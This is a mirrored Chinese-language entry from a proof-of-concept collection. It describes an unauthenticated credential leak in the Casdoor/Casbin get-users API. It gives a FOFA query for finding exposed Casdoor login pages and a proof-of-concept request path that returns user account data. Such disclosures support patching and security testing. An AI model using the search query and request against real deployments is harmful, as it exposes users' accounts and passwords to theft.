mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 11:58:05 +00:00
31 lines
440 B
Markdown
31 lines
440 B
Markdown
# Casbin get-users 账号密码泄漏漏洞
|
||
|
||
## 漏洞描述
|
||
|
||
Casbin get-users api接口存在账号密码泄漏漏洞,攻击者通过漏洞可以获取用户敏感信息
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
Casbin
|
||
```
|
||
|
||
## FOFA
|
||
|
||
```
|
||
title="Casdoor"
|
||
```
|
||
|
||
## 漏洞复现
|
||
|
||
登录页面
|
||
|
||

|
||
|
||
验证POC
|
||
|
||
```
|
||
/api/get-users?p=123&pageSize=123
|
||
```
|
||
|
||
 |